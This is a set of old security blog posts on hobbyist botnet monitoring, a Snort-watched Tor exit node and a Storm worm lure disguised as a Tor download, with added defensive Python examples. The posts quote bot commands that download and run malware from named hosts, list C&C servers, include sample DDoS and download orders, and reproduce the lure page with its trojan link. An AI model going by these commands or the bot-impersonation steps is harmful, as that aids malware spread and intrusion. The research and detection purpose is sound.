Sunday, February 03, 2008

Researching your own botnets

This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, it's almost as fun as people watching.

Section 1, the rules of behavior:

You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IPs of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.

You may at some point get admin rights on the botnet; occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the bot's remove command with hostile code that causes more damage to the victim PC.

You may contact ISPs, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball; be prepared to back up your accusations/statements with hard facts.

In some countries monitoring botnets is illegal, in others there has not yet been a ruling. Check your local laws before monitoring! Understand that you accept all risks. If you're not comfortable with this, don't read any further.

You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.

Never, ever, use proxies to snoop on botnets. If you're too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxies means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally, you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.

Section 2, Locating binaries:

For this section I turned to my old standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:

.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe

.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`

.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp

Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.

Section 3, extracting information:

Malware disassembly is an art, and something that can't be explained in a paragraph or two. However, there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an assembly language class at a local college.

Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.

Section 4, putting it all together:

Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binary's Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local laws).

Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.
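What the journal has to capture is the wire-level session: the channel topic the bots receive on join (the standing order), topic changes and PRIVMSGs from the operator, the bots' own status reports, and the moment you get banned. A client also has to answer the server's PINGs or it is dropped, which is part of looking like a bot. The following is an added example of that journaling logic and is not Infiltrator's code or anything from the original post; the session lines are constructed (documentation addresses, made-up nicks and server names), and the command verbs the classifier knows are the common ones, not a complete list.

```python
"""Journal an IRC C&C session from its raw protocol lines.  Added example with a
constructed session; the verb lists are assumptions, not a complete catalogue."""

import re
from collections import Counter, namedtuple
from typing import List, Tuple

# Constructed session as the monitoring client would log it (server -> client lines only).
SAMPLE_SESSION = [
    ":irc.example.net 001 usa-xp-1234 :Welcome to the network",
    ":irc.example.net 332 usa-xp-1234 #pert :.advscan asn2 200 5 0 -r -b",
    "PING :irc.example.net",
    ":herder!op@hidden.host TOPIC #pert :.download http://203.0.113.7/update.exe C:/u.exe 1",
    ":herder!op@hidden.host PRIVMSG #pert :.ddos.syn 203.0.113.5 80 600",
    ":usa-xp-9876!bot@192.0.2.44 PRIVMSG #pert :[SCAN]: Random Port Scan started on 203.0.113.x:445",
    ":irc.example.net 474 usa-xp-1234 #pert :Cannot join channel (+b)",
]

Entry = namedtuple("Entry", "kind actor target text category")

# Verb patterns -> category.  The update rule matches by structure (verb followed by a URL)
# because the download verb is whatever the herder compiled in.
CATEGORIES = [
    ("ddos", re.compile(r"^\.(ddos|syn|udp|icmp|ping)\b", re.I)),
    ("spread", re.compile(r"^\.(advscan|scan|scanall|scanstop)\b", re.I)),
    ("update", re.compile(r"^\.\S+\s+h(?:tt|xx)ps?://", re.I)),
]

# Numerics and commands that mean the operator has spotted you and thrown you out.
BAN_SIGNALS = {"465", "474", "KICK", "KILL"}


def parse_irc(line: str) -> Tuple[str, str, List[str]]:
    """Split an RFC 1459 message into (prefix, command, params); the trailing param keeps its spaces."""
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    return prefix, params[0].upper(), params[1:]


def classify(text: str) -> str:
    """Bucket a topic or message so the journal shows what the botnet is being used for."""
    for name, rx in CATEGORIES:
        if rx.search(text):
            return name
    return "command" if text.startswith(".") else "chatter"


def journal_session(lines) -> Tuple[List[Entry], List[str]]:
    """Walk logged lines; return journal entries and the replies the client must send to stay connected."""
    entries, replies = [], []
    for raw in lines:
        prefix, command, params = parse_irc(raw)
        actor = prefix.split("!", 1)[0]
        if command == "PING":                           # unanswered PINGs get you disconnected
            replies.append("PONG :" + (params[0] if params else ""))
        elif command == "332" and len(params) >= 3:     # RPL_TOPIC on join: the standing order
            entries.append(Entry("topic", actor, params[1], params[2], classify(params[2])))
        elif command == "TOPIC" and len(params) >= 2:   # operator changes the order live
            entries.append(Entry("topic", actor, params[0], params[1], classify(params[1])))
        elif command == "PRIVMSG" and len(params) >= 2: # commands from the operator, reports from bots
            entries.append(Entry("msg", actor, params[0], params[1], classify(params[1])))
        elif command in BAN_SIGNALS:                    # you tipped your hand; note it and stop
            entries.append(Entry("banned", actor, " ".join(params[:2]), raw, "ban"))
    return entries, replies


def category_counts(entries) -> Counter:
    """Quick summary for the journal: how much scanning, updating and DoS you saw."""
    return Counter(e.category for e in entries)


if __name__ == "__main__":
    found, to_send = journal_session(SAMPLE_SESSION)
    for e in found:
        print(f"{e.kind:6} {e.category:8} {e.actor or '-':12} {e.target:6} {e.text}")
    print("replies owed:", to_send)
    print(category_counts(found))
```

Note that this only parses lines already logged; it deliberately does not speak to a server, and it never generates anything beyond the PONG the server demands, in keeping with Section 1.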

Section 5, moving on:

Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.


Thursday, September 27, 2007

Ever Snort Pot?

For the last couple of weeks DISOG has been running two TOR exit nodes for the purpose of identifying malicious activities. We just made up the buzzword SnortPot; it made a great title for this entry. Using the Snort IDS we monitored our exit nodes.

We identified six IRC networks operating on non-standard ports. Upon further investigation we found four of them were known botnets. These are probably botnet researchers who are too chicken to use their own IPs, rather than botnet owners. The login sequence was captured by the IDS and appeared to be bot-like.

There were hundreds of SQL injection attacks on servers. High profile agencies like NASA.gov, NIH.gov, MoneyFactory.gov, DCHealth.gov, UTCourts.gov, and VOA.gov were all targeted using what appeared to be automated scripts (the alerts were flying by so fast it was hard to keep up with the Snort tail).

We registered over 3000 porn web hits in one day, with 448 name/password combinations sent using plain-text (base64-encoded) HTTP Basic authentication. I Googled some of the credentials and found they had been posted online and had been indexed by Google. In many cases the credentials were posted two or more weeks ago.
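Basic authentication is base64(user:password): an encoding, not encryption, so anyone on the path, an exit node included, reads it as easily as the server does. The following is an added example, not part of the original post, showing how such exposure can be counted from captured requests without keeping the credentials themselves: each login is reduced to a salted hash whose salt is thrown away with the run. The requests are constructed with made-up hosts and logins, and the fingerprinting scheme is my choice.

```python
"""Cleartext credential exposure check for HTTP requests seen at a monitoring point.
Added example; the requests are constructed and the fingerprint scheme is assumed."""

import base64
import binascii
import hashlib
import os
from collections import defaultdict
from typing import Dict, Optional, Tuple


def _request(host: str, path: str, auth_header: Optional[str] = None) -> str:
    """Build a constructed HTTP/1.1 request for the samples below."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    if auth_header:
        lines.append("Authorization: " + auth_header)
    return "\r\n".join(lines) + "\r\n\r\n"


def _basic(user: str, password: str) -> str:
    """What a browser sends for Basic auth: base64 of user:password, nothing more."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed traffic sample.
SAMPLE_REQUESTS = [
    _request("members.example.test", "/gallery/", _basic("user", "s3cret")),
    _request("members.example.test", "/gallery/2", _basic("user", "s3cret")),  # same login again
    _request("other.example.test", "/", _basic("bob", "hunter:2")),            # colon inside password
    _request("members.example.test", "/index.html"),                           # no auth at all
    _request("members.example.test", "/api", "Bearer not-basic"),              # different scheme
]


def extract_basic_credentials(request: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) if the request carries HTTP Basic auth, else None."""
    head = request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:            # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "authorization":
            continue
        scheme, _, token = value.strip().partition(" ")
        if scheme.lower() != "basic":
            return None
        try:
            decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return None                             # malformed header, not a credential
        user, sep, password = decoded.partition(":")  # split on the first colon only
        return (user, password) if sep else None
    return None


def host_of(request: str) -> str:
    """Host header, lower-cased, or '' if absent."""
    for line in request.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            return value.strip().lower()
    return ""


def fingerprint(user: str, password: str, salt: bytes) -> str:
    """Salted hash of the login; once the salt is discarded nothing here identifies anyone."""
    h = hashlib.sha256(salt + b"\0" + user.encode() + b"\0" + password.encode())
    return h.hexdigest()[:16]


def audit(requests, salt: Optional[bytes] = None) -> Dict[str, int]:
    """Per host, how many distinct logins crossed the sensor in the clear; no credential is stored."""
    salt = salt or os.urandom(16)
    seen = defaultdict(set)
    for req in requests:
        creds = extract_basic_credentials(req)
        if creds is None:
            continue
        seen[host_of(req)].add(fingerprint(*creds, salt))
    return {host: len(fps) for host, fps in seen.items()}


if __name__ == "__main__":
    print(audit(SAMPLE_REQUESTS))
```

The per-host counts are the figure worth publishing; the decoded pairs are the thing Section 1 of the botnet post says you must neither repeat nor use.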

Three sites that triggered the child porn rules were turned over to the authorities. All of them were located in Russia.

Our network graphs showed systems in Russia were visited more frequently than any other country. Following Russia was Japan. Around 40% of the packets were routed to those two countries.

Only a small percentage used TOR as a SOCKS4a proxy, so they could perform DNS queries through our systems. Most of those DNS queries were for different torrent trackers. In our experience the majority of our alerts were related to torrents or porn. It is unclear how many of these torrents were in fact porn.

Eighteen malicious executable files were downloaded, not including 1676 CME711 (Storm Worm) binaries. It was obvious that at least one person used our exit nodes to routinely pull binaries from the Storm servers. (Some researchers have no shame!)

As honeypots go, it was a fairly easy one to set up: download the TOR client/server software, configure it to allow exits, and configure Snort with the Sourcefire VRT and Bleeding Edge rulesets.

The downside is that it's very hard to keep up with the alerts. Even with the help of BASE (the Basic Analysis and Security Engine front end) we had our hands full tracking down each alert. Even on a slow exit node you could see dozens of alerts per minute.

The IDS was not used to collect data on any of our visitors. We simply used it to trigger signatures that had already been developed. Several emails triggered on porn related topics, and when we identified these alerts were capturing email traffic we commented them out of our signature base to protect the privacy of those using the TOR network.

We could have easily captured all the data and performed more detailed analysis. However, we felt an IDS would give a high level idea of the malicious activities passing through the TOR network while protecting the privacy of legitimate TOR users.

After seeing the alerts TOR traffic created when leaving my exit nodes, I wonder how safe running an open proxy really is. Who is ultimately at risk when someone uses your IP address to attack a server, or to view child porn? That question hasn't yet been answered in a US court. So for now, our exit nodes have been disabled.

SnortPots are used every day by security gurus. Many of these types of honeypots sit at the edge of ISP or Corporate IP space. Be aware that any unencrypted internet traffic is visible to the casual snooper.

So what's the difference between using Snort as an IDS or as a honeypot? Nothing. I expect everyone to call their Snort sensors 'SnortPots' from now forward. :)


Thursday, September 06, 2007

CME711 (Storm) using TOR ruse

This morning I woke up to the latest storm page...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width="500">
<tr><td><img src="img/tor1.gif"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan="2">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href="tor.exe"><img src="img/tor2.png" border=0></a>
</td></tr>
</table>
</body>
</html>
The text is a word-for-word cut-and-paste from the official TOR website, tor.eff.org.

In summary, they're angling for more clicks by offering The Onion Router (TOR) proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe still resolve, while video.exe, setup.exe and labor.exe no longer do.
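The tell in the page above is not the text, which is the real project's, but the link: an executable served relative to the lure's own host rather than from tor.eff.org. That check is mechanical. The following is an added example, not code from the original post or from the Tor project, that pulls the anchors out of a copied-looking page and flags executable downloads hosted anywhere other than the site the page claims to be. The HTML sample is a constructed cut-down of the lure, the lure's URL (203.0.113.10) is assumed, and the only trusted host is the one the post names, tor.eff.org.

```python
"""Flag executable download links on a page that does not come from the site it imitates.
Added example with a constructed lure page; the page URL and the trusted host set are assumptions."""

from html.parser import HTMLParser
from typing import Dict, Iterable, List

# Constructed cut-down of the lure: the official text, a relative link to the trojan, and two more links.
LURE_HTML = """<html><head><title>Tor: anonymity online</title></head>
<body><table border=0 width="500">
<tr><td colspan="2">Tor is a toolset for a wide range of organizations and people ...
<a href="tor.exe"><img src="img/tor2.png" border=0></a>
<a href="https://tor.eff.org/download.html">official download page</a>
<a href="/sony.exe">another bait</a>
</td></tr></table></body></html>"""

# Extensions that mean "this link runs code on the visitor's machine".
EXECUTABLE_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".msi")


class LinkCollector(HTMLParser):
    """Collect the page title and every <a href>, nothing else."""

    def __init__(self):
        super().__init__()
        self.title_parts: List[str] = []
        self.links: List[str] = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title_parts.append(data)


def analyze_lure(html: str, page_url: str, trusted_hosts: Iterable[str]) -> Dict[str, object]:
    """Resolve every link against the page URL and report executable downloads off the trusted hosts."""
    from urllib.parse import urljoin, urlsplit

    trusted = {h.lower() for h in trusted_hosts}
    collector = LinkCollector()
    collector.feed(html)
    suspicious = []
    for href in collector.links:
        absolute = urljoin(page_url, href)        # "tor.exe" becomes http://<lure host>/tor.exe
        parts = urlsplit(absolute)
        host = (parts.hostname or "").lower()
        if parts.path.lower().endswith(EXECUTABLE_EXT) and host not in trusted:
            suspicious.append({"href": href, "url": absolute, "host": host})
    return {"title": "".join(collector.title_parts).strip(), "suspicious": suspicious}


if __name__ == "__main__":
    report = analyze_lure(LURE_HTML, "http://203.0.113.10/index.html", {"tor.eff.org"})
    print(report["title"])
    for finding in report["suspicious"]:
        print("download off-site:", finding["href"], "->", finding["url"])
```

The same check would pass the real download page, whose binaries sit on the project's own host; it is the mismatch between borrowed text and a local .exe that marks the lure.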

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/
